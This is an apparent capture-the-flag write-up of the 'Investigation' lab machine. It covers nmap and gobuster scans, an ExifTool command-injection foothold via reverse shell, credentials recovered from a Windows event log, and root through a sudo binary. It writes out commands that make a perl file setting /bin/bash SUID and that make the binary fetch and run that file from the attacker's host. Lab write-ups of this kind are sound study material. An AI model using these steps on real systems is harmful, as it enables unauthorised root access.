# Investigation! ## @Author : M3tr1c_r00t  Investigation is a medium linux machine in which to gain foothold, we use a command injection vulnerability on a vulnerable outdated exiftool version, analysing a microsoft outlook file and find some logs and find creds to the user and some binary explaitation and reverse engineering to get root priviledges. ### Enumeration #### Nmap ``` # Nmap 7.93 scan initiated Sat Jan 21 19:12:37 2023 as: nmap -sC -sV -A -p 22,80 -oN nmapports.txt 10.129.9.197 Nmap scan report for eforenzics.htb (10.129.9.197) Host is up (0.25s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 2f1e6306aa6ebbcc0d19d4152674c6d9 (RSA) | 256 274520add2faa73a8373d97c79abf30b (ECDSA) |_ 256 4245eb916e21020617b2748bc5834fe0 (ED25519) 80/tcp open http Apache httpd 2.4.41 |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: eForenzics - Premier Digital Forensics Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 245.36 ms 10.10.14.1 2 247.05 ms eforenzics.htb (10.129.9.197) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Jan 21 19:12:59 2023 -- 1 IP address (1 host up) scanned in 22.59 seconds ``` #### Gobuster ``` /.htaccess  (Status: 403) [Size: 279] /.hta  (Status: 403) [Size: 279] /.htpasswd  (Status: 403) [Size: 279] /assets  (Status: 301) [Size: 317] [--> http://eforenzics.htb/assets/] /index.html  (Status: 200) [Size: 10957] /server-status  (Status: 403) [Size: 279] ``` ### Foothold as www-data Since there is a web server running on port 80, we can take a look at it.  If we click on the go service to be able to access the image forensics service, we get redirected to an upload pane.  With that, we can try to upload an image(real) and see what the site does.  The site gives us a link and if we visit it, we get the exifdata of the image from the output of exiftool.  If you look keenly on the vesion number, we can see it is ```12.37``` which seems to be a bit outdated from the one on the terminal. With this information on hand, we can try and see if we can get a public exploit and boom! ``` https://gist.github.com/ert-plus/1414276e4cb5d56dd431c2f0429e4429 ```  Since we can see that there is a command injection vulnerability, we can exploit this to get a reverse shell onto our box. So i made a sh reverse shell payload, put it in index.html then piped this to bash to get a shell. (You could also have just done the payload directly onto burp...)  ### WWW-data to user After stabilizing the shell, I run linpeas and got an interesting file....  I had never come along a ```.msg``` file extension, I asked chatgpt for some help and it turns out, this is an email.  We can use an online .msg file viewer instead of using the microsoft outlook applicaton. We find an attached zip file.  We can also use outlook to view this...  done.. You can also just right click on the file and select open with outlook.  and there.  If we unzip the file, we find there is an.evtx file.  The .evtx file extension is used for Microsoft Windows Event Log files. These files contain a record of system, application, and security events that have occurred on a computer running Windows. The Windows Event Log is a centralized, standardized way for Windows applications and services to record important system events, warnings, and errors. The .evtx files can be viewed using the Windows Event Viewer, which is a built-in utility in Windows operating system. The Event Viewer allows you to view the contents of the .evtx files and analyze the events recorded within them. Well, since i was doing this box on a linux box, i searched for a converter and was able to convert this file to an xml file.  Since there was so much junk, i used the sort and uniq command to only see data which was not as much redundant. And we find some creds to the smorton user.  You could have analysed the file using windows event viewer but the filtering was a bit odd.  And we get the user flag. ### User to root If we look at our sudo permissions, we can run a wierd binary as root.  So with that, i transferred the binary to my machine for further analysis.  #### Explanation of what the binary is doing. The function begins by checking the value of the first parameter, param_1. If it is not equal to 3, the program prints "Exiting... " and exits with a status of 0 using the exit(0) function. The next check is to ensure that the user running the program has a user ID of 0 (indicating that they are the root user). This is done using the getuid() function, which returns the user ID of the current user. If the user ID is not 0, the program again prints "Exiting... " and exits with a status of 0. The program then uses the strcmp function to compare the string at memory address param_2 + 0x10 with the string "lDnxUysaQn". If the two strings are not equal, the program again prints "Exiting... " and exits with a status of 0. If all of the previous checks pass, the program prints "Running... " to indicate that it is proceeding with the rest of the actions. The program then opens a file with the same name as the string "lDnxUysaQn" in binary write mode using the fopen function, and assigns the file pointer to the variable __stream. It then uses the curl library to download a file from the URL specified by the memory address param_2 + 8, and writes it to the previously opened file using the curl_easy_setopt and curl_easy_perform functions. If the file was successfully downloaded, the program then constructs a string with the command "perl ./lDnxUysaQn" using the snprintf and malloc functions, and uses the system function to execute this command as the root user. The program then uses the system function to delete the file "lDnxUysaQn" and the curl_easy_cleanup function to cleanup the resources allocated by the curl library. If any of the previous steps fail, the program will print "Exiting... " and exit with a status of 0. #### Exploiting the binary. With that info, we can now bypass all the checks. So to bypass this, we need to create a perl file which will make the /bin/bash binary suid executable. We can put this file on our machines since we need to assign it a url. With that, we can now exploit the binary. ``` echo "system("chmod u+s /bin/bash");" > root.pl ``` executing this binary ``` sudo /usr/bin/binary http://<ip>/root.pl lDnxUysaQn ```  Let's check if it works.  We're root! And done! ## My socials: <br>@ twitter: https://twitter.com/M3tr1c_root <br>@ instagram: https://instagram.com/m3tr1c_r00t/